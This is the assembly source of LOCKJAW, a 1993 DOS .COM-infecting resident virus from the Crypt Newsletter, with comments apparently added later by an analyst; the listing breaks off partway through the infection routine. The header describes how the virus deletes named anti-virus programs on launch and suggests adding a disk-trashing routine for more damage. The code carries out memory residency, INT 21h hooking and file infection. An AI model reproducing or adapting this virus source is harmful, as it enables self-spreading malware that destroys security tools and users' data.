;LOCKJAW: a .COM-infecting resident virus with retaliatory
;anti-anti-virus capability. Programmed and contributed by Nikademus, for
;Crypt Newsletter 12, Feb. 1993.
;
;LOCKJAW is a resident virus which installs itself in
;memory using the same engine as the original Civil War/Proto-T virus.
;
;LOCKJAW hooks interrupt 21 and infects .COM files on execution, appending
;itself to the end of the "host."
;LOCKJAW will infect COMMAND.COM and is fairly transparent to a
;casual user, except when certain anti-virus programs
;(Integrity Master, McAfee's SCAN &
;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded.
;If LOCKJAW is present and any of these programs are employed from
;a write-protected diskette, the virus will, of course, generate
;"write protect" errors.
;
;LOCKJAW's "stinger" code demonstrates the simplicity of creating a strongly
;retaliating virus by quickly deleting the anti-virus program before it
;can execute and then displaying a "chomping" graphic. Even if the anti-
;virus program cannot detect LOCKJAW in memory, it will be deleted. This
;makes it essential that the user know how to either remove the virus from
;memory before beginning anti-virus measures, or at the least run the
;anti-virus component from a write-protected disk. At a time when retail
;anti-virus packages are becoming more complicated - and more likely that the
;average user will run them from default installations on his hard file -
;LOCKJAW's retaliating power makes it a potentially very annoying pest.
;A virus-programmer serious about inconveniencing a system could do a
;number of things with this basic idea. They are:
; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus
; instantly.
; 2. Alter the_stinger routine, so that the virus immediately attacks the
; hard file. The implementation is demonstrated by LOKJAW-DREI, which
; merely makes the disk inaccessible until a warm reboot if an anti-virus
; program is employed against it. By placing
; a BONA FIDE disk-trashing routine here, it becomes very hazardous for
; an unknowing user to employ anti-virus measures on a machine where
; LOCKJAW or a LOCKJAW-like program is memory resident.
;
;These anti-anti-virus strategies are becoming more numerous in viral
;programming.
;
;For example, Mark Ludwig programmed the features of a direct-action
;retaliating virus in his "Computer Virus Developments Quarterly."
;Peach, Groove and Encroacher viruses attack anti-virus software by
;deletion of files central
;to the functionality of the software.
;
;And in this issue, the Sandra virus employs a number
;of anti-anti-virus features.
;
;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and
;DREI infected files from a system, simply delete the "companion" .COM
;duplicates of your executables. Ensure that the machine has been booted
;from a clean disk. To remove the LOCKJAW .COM-appending virus, at this
;time it will be necessary for you to restore the contaminated files from
;a clean back-up.
;
.radix 16 ; every unsuffixed number in this file is hexadecimal (100 = 100h, 5a = 5Ah)
code segment
model small
assume cs:code, ds:code, es:code
org 100h ; .COM image: all offsets are relative to 100h in the load segment (PSP)
len equ offset last - begin ; byte length of the virus body, begin..last (`last` is defined later in the file)
vir_len equ len / 16d ; intended as the same length in 16-byte paragraphs; NOTE(review): with .radix 16 confirm the assembler reads `16d` as decimal 16 and not as hex 16Dh
host: db 0E9h, 03h, 00h, 43h, 44h, 00h ; 6-byte dummy host: E9 0003 = jmp to 106h (= begin) over "CD",0; the same 6 bytes the installer later restores from vict_head
;-----------------------------------------------------------------------
; Installer. Runs inside the infected host (cs=ds=es=PSP), presumably
; reached through a jump patched into the host's first 6 bytes (compare
; the dummy host above). Analyst notes, all visible in this listing:
;  * Self-relocation: `call virus` pushes the run-time address of `virus`;
;    bp = that address - 109h (its assembled address: 100h + 6-byte host
;    + 3-byte call), so every [label+bp] below is a relocated reference
;    into the appended body.
;  * Residency fingerprint: INT 21h with AX=2C2Ch is answered with
;    AX=0DCDh once the Lockjaw handler is installed.
;  * Memory footprint: the last ('Z') memory control block is shrunk by
;    100h paragraphs (4 KB) and the body is copied to the freed area at
;    offset 100h; INT 21h is then revectored into that area.
;-----------------------------------------------------------------------
begin:
call virus ; push the run-time address of `virus` (used as relocation base)
virus:
jmp after_note
note:
db '[lÖçk⌡äW].ߥ.ÑîkådëMû$' ; signature text (CP437), kept byte-exact: its length fixes every offset below
db '┼Hï$.pΓÖGΓåm.î$.à.{pΓÖ┼ö-┼].√âΓïåñ┼'
db '┼håÑk$.┼ó.ÇΓÿ₧'
after_note:
pop bp ; bp = run-time address of `virus` (pushed by `call virus`)
sub bp,109h ; minus its assembled address -> relocation delta for [label+bp] references
fix_victim:
mov di,0100h ; restore the host's original first 6 bytes at PSP:100h
lea si,ds:[vict_head+bp] ; from the saved copy (vict_head is defined later in the file)
mov cx,06h ; 6 bytes
rep movsb ; so the host runs unmodified after the jump at Bye_Bye
Is_I_runnin:
mov ax,2C2Ch ; "are you there?" probe: a resident Lockjaw handler answers 0DCDh
int 21h
cmp ax, 0DCDh ; already resident?
je Bye_Bye ; yes: skip installation and run the host
cut_hole:
mov ax,cs ; segment of this program's memory control block (MCB) = PSP - 1
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; install only if this is the last MCB in the chain ('Z' = 5Ah)
jne abort ; otherwise leave memory untouched
mov ax,ds:[0003] ; MCB size field, in paragraphs
sub ax,100 ; reserve 100h paragraphs (4 KB) at the top of the block
mov ds:0003,ax ; by writing the reduced size back into the MCB
Zopy_virus: ; copy the body into the reserved area
mov bx,ax ; bx = reduced block size (paragraphs)
mov ax,es ; es = PSP = start of the block
add ax,bx ; PSP + size = first paragraph of the reserved area
mov es,ax
mov cx,len ; cx = length of the virus body in bytes
mov ax,ds ; ds = MCB + 1 = PSP again
inc ax
mov ds,ax
lea si,ds:[begin+bp] ; si = relocated start of the body inside the host
lea di,es:0100 ; di = 100h in the reserved segment: `begin` was assembled at 106h,
rep movsb ; so the resident copy sits 6 bytes below its assembled offsets (hence the `-6` below)
mov [vir_seg+bp],es ; remember the resident segment (vir_seg is defined later in the file)
mov ax,cs
mov es,ax ; restore es
Grab_21:
cli ; no interrupts while the vector is swapped
mov ax,3521h ; INT 21h/35h: read the current INT 21h vector into es:bx
int 21h
mov ds,[vir_seg+bp] ; ds = resident copy
mov ds:[old_21h-6h],bx ; save the old vector inside the resident copy (old_21h is defined later;
mov ds:[old_21h+2-6h],es ; -6 corrects for the copy living at 100h instead of 106h)
mov dx,offset Lockjaw - 6h ; ds:dx = resident handler, same -6 correction
mov ax,2521h ; INT 21h/25h: set vector; INT 21h now points into the top 4 KB of the last MCB
int 21h ; (that vector target is the memory-resident artefact an analyst can look for)
sti
abort:
mov ax,cs ; restore segment registers for the host
mov ds,ax
mov es,ax
xor ax,ax
Bye_Bye:
mov bx,0100h ; hand off to the restored host entry point
jmp bx
;-----------------------------------------------------------------------
; Lockjaw: resident INT 21h handler. The resident copy lives at offset
; 100h, six bytes below its assembled offsets, so every cs:[label-6]
; below addresses the copy's own data.
; Observable behaviour: AX=2C2Ch is answered with AX=0DCDh without
; reaching DOS (residency fingerprint); AX=4B00h (EXEC) is diverted to
; chk_com; every other call is chained to the saved vector unchanged.
;-----------------------------------------------------------------------
Lockjaw:
pushf ; keep caller flags across the compare
cmp ax,2c2ch ; residency probe from the installer?
jne My_21h
mov ax,0dcdh ; reply without calling DOS
popf
iret
My_21h:
push ds ; save caller registers; restored in the same order at notforme
push es
push di
push si
push ax
push bx
push cx
push dx
check_exec:
cmp ax,04B00h ; AH=4Bh/AL=00h: load and execute a program
jne notforme ; anything else: pass straight through
mov cs:[name_seg-6],ds ; stash ds:dx, the ASCIIZ path of the program being run
mov cs:[name_off-6],dx ; (name_seg/name_off are defined later in the file)
jmp chk_com ; check the name and possibly infect (chk_com, below)
notforme:
pop dx ; common exit: restore caller registers
pop cx
pop bx
pop ax
pop si
pop di
pop es
pop ds
popf
jmp dword ptr cs:[old_21h-6] ; far jump to the original INT 21h vector saved by Grab_21
int21: ; helper: call the original INT 21h directly (pushf + far call emulates `int 21h`
pushf ; without passing through the Lockjaw hook again); used by the infection code below
call dword ptr cs:[old_21h-6]
jc notforme ; DOS reported an error (CF set): leave via the register-restore exit
ret ; success: return to the caller with DOS's results in the registers
chk_com: cld ; this essentially copies
mov di,dx ; the name of the file
push ds ; and sets it up for
pop es ; comparison to the anti-
mov al,'.' ; virus defaults used in
repne scasb ; the_stinger
call the_stinger ; anti-virus stinger
cmp ax, 00ffh ; WAS the program an AV?
je notforme
cmp word ptr es:[di],'OC' ; is it a .com ?
jne notforme ; compare against extension
cmp word ptr es:[di+2],'M' ; masks in these two steps
jne notforme
call Grab_24 ; set critical error handler
call set_attrib
open_victim: ; open potential host
mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
mov ax,3D02h
call int21
jc close_file